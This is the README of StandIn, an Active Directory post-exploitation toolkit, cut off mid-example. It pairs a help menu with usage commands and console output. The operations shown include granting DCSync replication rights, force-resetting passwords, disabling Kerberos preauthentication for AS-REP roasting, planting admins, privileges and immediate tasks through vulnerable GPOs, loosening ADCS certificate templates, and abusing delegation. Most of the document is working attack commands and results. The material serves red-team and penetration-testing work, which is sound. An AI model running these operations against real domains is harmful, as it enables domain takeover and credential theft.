StandIn is a small AD post-compromise toolkit. StandIn came about because recently at xforcered we needed a .NET native solution to perform resource based constrained delegation. However, StandIn quickly ballooned to include a number of comfort features.
I want to continue developing StandIn to teach myself more about Directory Services programming and to hopefully expand a tool which fits in to the AD post-exploitation toolchain.
Contributions are most welcome. Please ensure pull requests include the following items: description of the functionality, brief technical explanation and sample output.
Do you have something you want to see added to StandIn but don't have a PR? Please open a ticket and describe the functionality as best as possible.
The following items are currently on the radar for implementation in subsequent versions of StandIn.
- Domain share enumeration. This can be split out into two parts, (1) finding and getting a unique list based on user home directories / script paths / profile paths and (2) querying fTDfs / msDFS-Linkv2 objects.
- Finding and parsing GPO's to map users to host local groups.
- GPO -> OU & OU -> GPO.
- Rewrite policy function probably.
- Adding optional JSON/XML output for some functions to help with scripting.
- Code needs a re-factor, better modularized functions and split out into different classes.
- An ACE up the sleeve (by @_wald0 & @harmj0y) - here
- Kerberoasting (by @xpn) - here
- Roasting AS-REPs (by @harmj0y) - here
- Kerberos Unconstrained Delegation (by @spotheplanet) - here
- S4U2Pwnage (by @harmj0y) - here
- Resource-based Constrained Delegation (by @spotheplanet) - here
- Rubeus - here
- Powerview - here
- Powermad (by @kevin_robertson) - here
- SharpGPOAbuse (by @den_n1s & @pkb1s) - here
- adidnsdump (by @_dirkjan) - here
- Certified Pre-Owned (by @harmj0y & @tifkin_) - here
- Help
- LDAP Object Operations
- SID
- ASREP
- PASSWD_NOTREQD
- SPN
- Unconstrained / constrained / resource-based constrained delegation
- DC's
- Trust
- GPO Operations
- Policy
- DNS
- Groups Operations
- Machine Object Operations
- Active Directory Certificate Services (ADCS)
- Detection
- Special Thanks
__
( _/_ _// ~b33f
__)/(//)(/(/) v1.4
>--~~--> Args? <--~~--<
--help This help menu
--object LDAP filter, e.g. samaccountname=HWest
--ldap LDAP filter, can return result collection
--filter Filter results, varies based on function
--limit Limit results, varies based on function, defaults to 50
--computer Machine name, e.g. Celephais-01
--group samAccountName, e.g. "Necronomicon Admins"
--ntaccount User name, e.g. "REDHOOK\UPickman"
--sid Dependent on context
--grant User name, e.g. "REDHOOK\KMason"
--guid Rights GUID to add to object, e.g. 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
--domain Domain name, e.g. REDHOOK
--user User name
--pass Password
--newpass New password to set for object
--gpo List group policy objects
--acl Show ACL's for returned GPO's
--localadmin Add samAccountName to BUILTIN\Administrators for vulnerable GPO
--setuserrights samAccountName for which to add token rights in a vulnerable GPO
--tasktype Immediate task type (user/computer)
--taskname Immediate task name
--author Immediate task author
--command Immediate task command
--args Immediate task command args
--target Optional, filter for DNS name or NTAccount
--targetsid Optional, provider user SID
--increase Increment either the user or computer GPO version number for the AD object
--policy Reads some account/kerberos properties from the "Default Domain Policy"
--dns Performs ADIDNS enumeration, supports wildcard filters
--legacy Boolean, sets DNS seach root to legacy (CN=System)
--forest Boolean, sets DNS seach root to forest (DC=ForestDnsZones)
--passnotreq Boolean, list accounts that have PASSWD_NOTREQD set
--type Rights type: GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync
--spn Boolean, list kerberoastable accounts
--setspn samAccountName for which to add/remove an SPN
--principal Principal name to add to samAccountName (e.g. MSSQL/VermisMysteriis)
--delegation Boolean, list accounts with unconstrained / constrained delegation
--asrep Boolean, list ASREP roastable accounts
--dc Boolean, list all domain controllers
--trust Boolean, list all trust relationships
--adcs List all CA's and all published templates
--clientauth Boolean, modify ADCS template to add/remove "Client Authentication"
--ess Boolean, modify ADCS template to add/remove "ENROLLEE_SUPPLIES_SUBJECT"
--pend Boolean, modify ADCS template to add/remove "PEND_ALL_REQUESTS"
--owner Boolean, modify ADCS template owner
--write Boolean, modify ADCS template, add/remove WriteDacl/WriteOwner/WriteProperty permission for NtAccount
--enroll Boolean, modify ADCS template, add/remove "Certificate-Enrollment" permission for NtAccount
--add Boolean, context dependent group/spn/adcs
--remove Boolean, context dependent msDS-AllowedToActOnBehalfOfOtherIdentity/group/adcs
--make Boolean, make machine; ms-DS-MachineAccountQuota applies
--disable Boolean, disable machine; should be the same user that created the machine
--access Boolean, list access permissions for object
--delete Boolean, delete machine from AD; requires elevated AD access
>--~~--> Usage? <--~~--<
# Perform LDAP search
StandIn.exe --ldap "(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))"
StandIn.exe --ldap servicePrincipalName=* --domain redhook --user RFludd --pass Cl4vi$Alchemi4e --limit 10
StandIn.exe --ldap servicePrincipalName=* --filter "pwdlastset, distinguishedname, lastlogon" --limit 100
# Query object properties by LDAP filter
StandIn.exe --object "(&(samAccountType=805306368)(servicePrincipalName=*vermismysteriis.redhook.local*))"
StandIn.exe --object samaccountname=Celephais-01$ --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
StandIn.exe --object samaccountname=Celephais-01$ --filter "pwdlastset, serviceprincipalname, objectsid"
# Query object access permissions, optionally filter by NTAccount
StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --access
StandIn.exe --object samaccountname=Rllyeh$ --access --ntaccount "REDHOOK\EDerby"
StandIn.exe --object samaccountname=JCurwen --access --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Grant object access permissions
StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOK\MBWillett" --type DCSync
StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOK\MBWillett" --guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
StandIn.exe --object samaccountname=SomeTarget001$ --grant "REDHOOK\MBWillett" --type GenericWrite --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Set object password
StandIn.exe --object samaccountname=SomeTarget001$ --newpass "Arkh4mW1tch!"
StandIn.exe --object samaccountname=BJenkin --newpass "Dr34m1nTh3H#u$e" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Add ASREP to userAccountControl flags
StandIn.exe --object samaccountname=HArmitage --asrep
StandIn.exe --object samaccountname=FMorgan --asrep --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Remove ASREP from userAccountControl flags
StandIn.exe --object samaccountname=TMalone --asrep --remove
StandIn.exe --object samaccountname=RSuydam --asrep --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Get a list of all ASREP roastable accounts
StandIn.exe --asrep
StandIn.exe --asrep --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Return GPO objects, optionally wildcard filter and get ACL's
StandIn.exe --gpo --limit 20
StandIn.exe --gpo --filter admin --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
StandIn.exe --gpo --filter admin --acl --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Add samAccountName to BUILTIN\Administrators for vulnerable GPO
StandIn.exe --gpo --filter ArcanePolicy --localadmin JCurwen
StandIn.exe --gpo --filter ArcanePolicy --localadmin JCurwen --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Add token rights to samAccountName in a vulnerable GPO
StandIn.exe --gpo --filter ArcanePolicy --setuserrights JCurwen --grant "SeTcbPrivilege,SeDebugPrivilege"
StandIn.exe --gpo --filter ArcanePolicy --setuserrights JCurwen --grant SeLoadDriverPrivilege --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Add user/computer immediate task and optionally filter
StandIn.exe --gpo --filter ArcanePolicy --taskname LiberInvestigationis --tasktype computer --author "REDHOOK\JCurwen" --command "C:\Windows\System32\notepad.exe" --args "C:\Mysteriis\CultesDesGoules.txt"
StandIn.exe --gpo --filter ArcanePolicy --taskname LiberInvestigationis --tasktype computer --author "REDHOOK\JCurwen" --command "C:\Windows\System32\notepad.exe" --args "C:\Mysteriis\CultesDesGoules.txt" --target Rllyeh.redhook.local
StandIn.exe --gpo --filter ArcanePolicy --taskname LiberInvestigationis --tasktype user --author "REDHOOK\JCurwen" --command "C:\Windows\System32\notepad.exe" --args "C:\Mysteriis\CultesDesGoules.txt" --target "REDHOOK\RBloch" --targetsid S-1-5-21-315358687-3711474269-2098994107-1106
StandIn.exe --gpo --filter ArcanePolicy --taskname LiberInvestigationis --tasktype computer --author "REDHOOK\JCurwen" --command "C:\Windows\System32\notepad.exe" --args "C:\Mysteriis\CultesDesGoules.txt" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Increment either the user or computer GPO version number for the AD object
StandIn.exe --gpo --filter ArcanePolicy --increase --tasktype user
StandIn.exe --gpo --filter ArcanePolicy --increase --tasktype computer --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Read Default Domain Policy
StandIn.exe --policy
StandIn.exe --policy --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Perform ADIDNS searches
StandIn.exe --dns --limit 20
StandIn.exe --dns --filter SQL --limit 10
StandIn.exe --dns --forest --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
StandIn.exe --dns --legacy --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# List account that have PASSWD_NOTREQD set
StandIn.exe --passnotreq
StandIn.exe --passnotreq --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Get user and SID from either a SID or a samAccountName
StandIn.exe --sid JCurwen
StandIn.exe --sid S-1-5-21-315358687-3711474269-2098994107-1105 --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Get a list of all kerberoastable accounts
StandIn.exe --spn
StandIn.exe --spn --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Add/remove SPN from samAccountName
StandIn.exe --setspn RSuydam --principal MSSQL/VermisMysteriis --add
StandIn.exe --setspn RSuydam --principal MSSQL/VermisMysteriis --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# List all accounts with unconstrained & constrained delegation privileges
StandIn.exe --delegation
StandIn.exe --delegation --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Get a list of all domain controllers
StandIn.exe --dc
# Get a list of all trust relationships in the current domain
StandIn.exe --trust
# List members of group or list user group membership
StandIn.exe --group Literarum
StandIn.exe --group "Magna Ultima" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
StandIn.exe --group JCurwen --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Add user to group
StandIn.exe --group "Dunwich Council" --ntaccount "REDHOOK\WWhateley" --add
StandIn.exe --group DAgon --ntaccount "REDHOOK\RCarter" --add --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Remove user from group
StandIn.exe --group "Dunwich Council" --ntaccount "REDHOOK\WWhateley" --remove
StandIn.exe --group DAgon --ntaccount "REDHOOK\RCarter" --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# List CA's and all published templates, optionally wildcard filter on template name
StandIn.exe --adcs
StandIn.exe --adcs --filter Kingsport
StandIn.exe --adcs --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Add/remove "Client Authentication" from template pKIExtendedKeyUsage, filter should contain the exact name of the template
StandIn.exe --adcs --filter Kingsport --clientauth --add
StandIn.exe --adcs --filter Kingsport --clientauth --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Add/remove "ENROLLEE_SUPPLIES_SUBJECT" from template msPKI-Certificate-Name-Flag, filter should contain the exact name of the template
StandIn.exe --adcs --filter Kingsport --ess --add
StandIn.exe --adcs --filter Kingsport --ess --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Add/remove "PEND_ALL_REQUESTS" from template msPKI-Enrollment-Flag, filter should contain the exact name of the template
StandIn.exe --adcs --filter Kingsport --pend --add
StandIn.exe --adcs --filter Kingsport --pend --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Change template owner, filter should contain the exact name of the template
StandIn.exe --adcs --filter Kingsport --ntaccount "REDHOOK\MBWillett" --owner
StandIn.exe --adcs --filter Kingsport --ntaccount "REDHOOK\MBWillett" --owner --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Grant NtAccount WriteDacl/WriteOwner/WriteProperty, filter should contain the exact name of the template
StandIn.exe --adcs --filter Kingsport --ntaccount "REDHOOK\MBWillett" --write --add
StandIn.exe --adcs --filter Kingsport --ntaccount "REDHOOK\MBWillett" --write --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Grant NtAccount "Certificate-Enrollment", filter should contain the exact name of the template
StandIn.exe --adcs --filter Kingsport --ntaccount "REDHOOK\MBWillett" --enroll --add
StandIn.exe --adcs --filter Kingsport --ntaccount "REDHOOK\MBWillett" --enroll --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Create machine object
StandIn.exe --computer Innsmouth --make
StandIn.exe --computer Innsmouth --make --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Disable machine object
StandIn.exe --computer Arkham --disable
StandIn.exe --computer Arkham --disable --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Delete machine object
StandIn.exe --computer Danvers --delete
StandIn.exe --computer Danvers --delete --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Add msDS-AllowedToActOnBehalfOfOtherIdentity to machine object properties
StandIn.exe --computer Providence --sid S-1-5-21-1085031214-1563985344-725345543
StandIn.exe --computer Providence --sid S-1-5-21-1085031214-1563985344-725345543 --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
# Remove msDS-AllowedToActOnBehalfOfOtherIdentity from machine object properties
StandIn.exe --computer Miskatonic --remove
StandIn.exe --computer Miskatonic --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e
All --object operations expect that the LDAP filter returns a single object and will exit out if your query returns more. This is by design. If you wish to pull back an array of objects you should use --ldap.
Operationally, we may want to retrieve an array of AD object and optionally filter and/or limit the results and properties.
Get all properties of the resolved objects. Queries can be simple matches for a single property or complex LDAP filters. Optionally limit the results returned with --limit.
C:\> StandIn.exe --ldap "(&(displayName=*)(gpcfilesyspath=*))" --filter "gpcfilesyspath,versionnumber"
[?] Using DC : m-w16-dc01.main.redhook.local
[+] LDAP search result count : 3
|_ Result limit : 50
[?] Iterating result properties
|_ Applying property filter => gpcfilesyspath,versionnumber
[?] Object : CN={6AC1786C-016F-11D2-945F-00C04fB984F9}
Path : LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=redhook,DC=local
[+] versionnumber
|_ User Version : 0
|_ Computer Version : 1
[+] gpcfilesyspath
|_ \\redhook.local\sysvol\redhook.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
[?] Object : CN={31B2F340-016D-11D2-945F-00C04FB984F9}
Path : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=redhook,DC=local
[+] versionnumber
|_ User Version : 0
|_ Computer Version : 11
[+] gpcfilesyspath
|_ \\redhook.local\sysvol\redhook.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
[?] Object : CN={58890948-8DE3-4A39-8C40-F68004186693}
Path : LDAP://CN={58890948-8DE3-4A39-8C40-F68004186693},CN=Policies,CN=System,DC=redhook,DC=local
[+] versionnumber
|_ User Version : 2
|_ Computer Version : 4
[+] gpcfilesyspath
|_ \\redhook.local\SysVol\redhook.local\Policies\{58890948-8DE3-4A39-8C40-F68004186693}
Operationally, we may want to look at all of the properties of a specific object in AD. A common example would be to look at what groups a user account is member of or when a user account last authenticated to the domain.
Return the resolved object. Queries can be simple matches for a single property or complex LDAP filters. Optionally filter the properties you wish to pull back with --filter.
C:\> StandIn.exe --object samaccountname=m-10-1909-01$
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-10-1909-01
Path : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[?] Iterating object properties
[+] logoncount
|_ 360
[+] codepage
|_ 0
[+] objectcategory
|_ CN=Computer,CN=Schema,CN=Configuration,DC=main,DC=redhook,DC=local
[+] iscriticalsystemobject
|_ False
[+] operatingsystem
|_ Windows 10 Enterprise
[+] usnchanged
|_ 195797
[+] instancetype
|_ 4
[+] name
|_ M-10-1909-01
[+] badpasswordtime
|_ 0x0
[+] pwdlastset
|_ 10/9/2020 4:42:02 PM UTC
[+] serviceprincipalname
|_ TERMSRV/M-10-1909-01
|_ TERMSRV/m-10-1909-01.main.redhook.local
|_ WSMAN/m-10-1909-01
|_ WSMAN/m-10-1909-01.main.redhook.local
|_ RestrictedKrbHost/M-10-1909-01
|_ HOST/M-10-1909-01
|_ RestrictedKrbHost/m-10-1909-01.main.redhook.local
|_ HOST/m-10-1909-01.main.redhook.local
[+] objectclass
|_ top
|_ person
|_ organizationalPerson
|_ user
|_ computer
[+] badpwdcount
|_ 0
[+] samaccounttype
|_ SAM_MACHINE_ACCOUNT
[+] lastlogontimestamp
|_ 11/1/2020 7:40:09 PM UTC
[+] usncreated
|_ 31103
[+] objectguid
|_ 17c80232-2ee6-47e1-9ab5-22c51c268cf0
[+] localpolicyflags
|_ 0
[+] whencreated
|_ 7/9/2020 4:59:55 PM
[+] adspath
|_ LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] useraccountcontrol
|_ WORKSTATION_TRUST_ACCOUNT
[+] cn
|_ M-10-1909-01
[+] countrycode
|_ 0
[+] primarygroupid
|_ 515
[+] whenchanged
|_ 11/2/2020 7:59:32 PM
[+] operatingsystemversion
|_ 10.0 (18363)
[+] dnshostname
|_ m-10-1909-01.main.redhook.local
[+] dscorepropagationdata
|_ 10/30/2020 6:56:30 PM
|_ 10/25/2020 1:28:32 AM
|_ 7/16/2020 2:15:26 PM
|_ 7/15/2020 8:54:17 PM
|_ 1/1/1601 12:04:17 AM
[+] lastlogon
|_ 11/3/2020 10:21:11 AM UTC
[+] distinguishedname
|_ CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] msds-supportedencryptiontypes
|_ RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[+] samaccountname
|_ M-10-1909-01$
[+] objectsid
|_ S-1-5-21-1293271031-3053586410-2290657902-1126
[+] lastlogoff
|_ 0
[+] accountexpires
|_ 0x7FFFFFFFFFFFFFFF
At certain stages of the engagement, the operator may want to resolve the access permissions for a specific object in AD. Many permissions can offer an operational avenue to expand access or achieve objectives. For instance, a WriteDacl permission on a group could allow the operator to grant him / her self permissions to add a new user to the group. Tools like SharpHound already, in many instances, reveal these Dacl weaknesses.
Retrieve the active directory rules that apply to the resolved object and translate any schema / rights GUID's to their friendly name. Optionally filter the results by an NTAccount name.
C:\>StandIn.exe --object samaccountname=m-10-1909-01$ --access
[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object : CN=M-10-1909-01
Path : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] Object properties
|_ Owner : MAIN\domainjoiner
|_ Group : MAIN\Domain Join
[+] Object access rules
[+] Identity --> NT AUTHORITY\SELF
|_ Type : Allow
|_ Permission : CreateChild, DeleteChild
|_ Object : ANY
[+] Identity --> NT AUTHORITY\Authenticated Users
|_ Type : Allow
|_ Permission : GenericRead
|_ Object : ANY
[... Snip ...]
C:\> StandIn.exe --object samaccountname=m-10-1909-01$ --access --ntaccount "MAIN\domainjoiner"
[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object : CN=M-10-1909-01
Path : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] Object properties
|_ Owner : MAIN\domainjoiner
|_ Group : MAIN\Domain Join
[+] Object access rules
[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : DeleteTree, ExtendedRight, Delete, GenericRead
|_ Object : ANY
[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : WriteProperty
|_ Object : User-Account-Restrictions
[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : Self
|_ Object : servicePrincipalName
[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : Self
|_ Object : dNSHostName
[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : WriteProperty
|_ Object : sAMAccountName
[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : WriteProperty
|_ Object : displayName
[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : WriteProperty
|_ Object : description
[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : WriteProperty
|_ Object : User-Logon
[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : Self
|_ Object : DS-Validated-Write-Computer
With the appropriate rights, the operator can grant an NTAccount special permissions over a specific object in AD. For instance, if an operator has GenericAll privileges over a user account they can grant themselves or a 3rd party NTAccount permission to change the user’s password without knowing the current password.
Add permission to the resolved object for a specified NTAccount. StandIn supports a small set of pre-defined privileges (GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync) but it also allows operators to specify a custom rights guid using the --guid flag.
C:\> whoami
main\s4uuser
C:\> StandIn.exe --group lowPrivButMachineAccess
[?] Using DC : m-w19-dc01.main.redhook.local
[?] Group : lowPrivButMachineAccess
GUID : 37e3d957-af52-4cc6-8808-56330f8ec882
[+] Members
[?] Path : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : s4uUser
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1197
C:\> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --access --ntaccount "MAIN\lowPrivButMachineAccess"
[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object : DC=main
Path : LDAP://DC=main,DC=redhook,DC=local
[+] Object properties
|_ Owner : BUILTIN\Administrators
|_ Group : BUILTIN\Administrators
[+] Object access rules
[+] Identity --> MAIN\lowPrivButMachineAccess
|_ Type : Allow
|_ Permission : WriteDacl
|_ Object : ANY
C:\> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --grant "MAIN\s4uuser" --type DCSync
[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object : DC=main
Path : LDAP://DC=main,DC=redhook,DC=local
[+] Object properties
|_ Owner : BUILTIN\Administrators
|_ Group : BUILTIN\Administrators
[+] Set object access rules
|_ Success, added dcsync privileges to object for MAIN\s4uuser
C:\> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --access --ntaccount "MAIN\s4uUser"
[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object : DC=main
Path : LDAP://DC=main,DC=redhook,DC=local
[+] Object properties
|_ Owner : BUILTIN\Administrators
|_ Group : BUILTIN\Administrators
[+] Object access rules
[+] Identity --> MAIN\s4uUser
|_ Type : Allow
|_ Permission : ExtendedRight
|_ Object : DS-Replication-Get-Changes-All
[+] Identity --> MAIN\s4uUser
|_ Type : Allow
|_ Permission : ExtendedRight
|_ Object : DS-Replication-Get-Changes
[+] Identity --> MAIN\s4uUser
|_ Type : Allow
|_ Permission : ExtendedRight
|_ Object : DS-Replication-Get-Changes-In-Filtered-Set
If the operator has
User-Force-Change-Passwordpermissions over a user object they can change the password for that user account without knowing the current password. This action is destructive as the user will no longer be able to authenticate which may raise alarm bells.
Set the resolved object's password without knowing the current password.
C:\> whoami
main\s4uuser
C:\> StandIn.exe --object "samaccountname=user005" --access --ntaccount "MAIN\lowPrivButMachineAccess"
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] Object properties
|_ Owner : MAIN\Domain Admins
|_ Group : MAIN\Domain Admins
[+] Object access rules
[+] Identity --> MAIN\lowPrivButMachineAccess
|_ Type : Allow
|_ Permission : WriteDacl
|_ Object : ANY
C:\> StandIn.exe --object "samaccountname=user005" --grant "MAIN\s4uuser" --type resetpassword
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] Object properties
|_ Owner : MAIN\Domain Admins
|_ Group : MAIN\Domain Admins
[+] Set object access rules
|_ Success, added resetpassword privileges to object for MAIN\s4uuser
C:\> StandIn.exe --object "samaccountname=user005" --access --ntaccount "MAIN\s4uUser"
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] Object properties
|_ Owner : MAIN\Domain Admins
|_ Group : MAIN\Domain Admins
[+] Object access rules
[+] Identity --> MAIN\s4uUser
|_ Type : Allow
|_ Permission : ExtendedRight
|_ Object : User-Force-Change-Password
C:\> StandIn.exe --object "samaccountname=user005" --newpass "Arkh4mW1tch!"
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] Object properties
|_ Owner : MAIN\Domain Admins
|_ Group : MAIN\Domain Admins
[+] Setting account password
|_ Success, password set for object
If the operator has write access to a user account, they can modify the user’s
userAccountControlflags to includeDONT_REQUIRE_PREAUTH. Doing so allows the operator to request an AS-REP hash for the user which can be cracked offline. This process is very similar to kerberoasting. This action is not destructive, but it relies on the fact that the user has a password which can be cracked in a reasonable timeframe.
Add and remove DONT_REQUIRE_PREAUTH from the resolved object's userAccountControl flags.
C:\> StandIn.exe --object "samaccountname=user005" --asrep
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
[*] SamAccountName : user005
DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD
[+] Updating userAccountControl..
|_ Success
C:\> StandIn.exe --asrep
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Found 1 object(s) that do not require Kerberos preauthentication..
[*] SamAccountName : user005
DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH
C:\> StandIn.exe --object "samaccountname=user005" --asrep --remove
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
[*] SamAccountName : user005
DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH
[+] Updating userAccountControl..
|_ Success
C:\> StandIn.exe --asrep
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Found 0 object(s) that do not require Kerberos preauthentication..
Sometimes you have either a
SIDorsamAccountNameand you need to get the other. This is a simple helper function to do that for you.
Convert SID or samAccountName to the user SID and NTAccount.
C:\> StandIn.exe --sid user001
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=user 001
Path : LDAP://CN=user 001,CN=Users,DC=redhook,DC=local
[+] User : REDHOOK.LOCAL\user001
SID : S-1-5-21-315358687-3711474269-2098994107-1105
C:\> StandIn.exe --sid S-1-5-21-315358687-3711474269-2098994107-1105
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=user 001
Path : LDAP://CN=user 001,CN=Users,DC=redhook,DC=local
[+] User : REDHOOK.LOCAL\user001
SID : S-1-5-21-315358687-3711474269-2098994107-1105
This function enumerates all accounts in AD which are currently enabled and have
DONT_REQUIRE_PREAUTHas part of theiruserAccountControlflags. These accounts can be AS-REP roasted, this process is very similar to kerberoasting.
Return all accounts that are ASREP roastable.
C:\> StandIn.exe --asrep
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Found 1 object(s) that do not require Kerberos preauthentication..
[*] SamAccountName : user005
DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH
This function enumerates all accounts in AD which are currently enabled and have
PASSWD_NOTREQDas part of theiruserAccountControlflags. These accounts can have blank passwords despite GPO enforcement but they can also have a password configured.
Return all accounts that have PASSWD_NOTREQD set.
C:\> StandIn.exe --passnotreq
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Found 2 object(s) that do not require a password..
[*] SamAccountName : passnotreq
DistinguishedName : CN=passnotreq,CN=Users,DC=redhook,DC=local
PwdLastSet : 6/6/2021 10:47:27 PM UTC
lastlogon : 0x0
userAccountControl : PASSWD_NOTREQD, NORMAL_ACCOUNT
[*] SamAccountName : REDHOOKSLSRV$
DistinguishedName : CN=RedHookSLSRV,CN=Computers,DC=redhook,DC=local
PwdLastSet : 6/6/2021 10:51:37 PM UTC
lastlogon : 0x0
userAccountControl : PASSWD_NOTREQD, WORKSTATION_TRUST_ACCOUNT
These functions deal specifically with SPN's.
This function enumerates all accounts in AD which are currently enabled and can be kerberoasted. Some basic account information is added for context: when was the password last set, when was the account last used and what encryption types are supported.
Return all accounts that are kerberoastable.
C:\> StandIn.exe --spn
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Found 1 kerberostable users..
[*] SamAccountName : SimCritical
DistinguishedName : CN=SimCritical,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
ServicePrincipalName : ldap/M-2012R2-03.main.redhook.local
PwdLastSet : 11/2/2020 7:06:17 PM UTC
lastlogon : 0x0
Supported ETypes : RC4_HMAC_DEFAULT
With the appropriate permissions, this function allows you to add and remove an
SPNfrom asamAccountName.
Add and remove SPN's from a samAccountName.
C:\> StandIn.exe --setspn user001 --principal MSSQL/Alchimiae --add
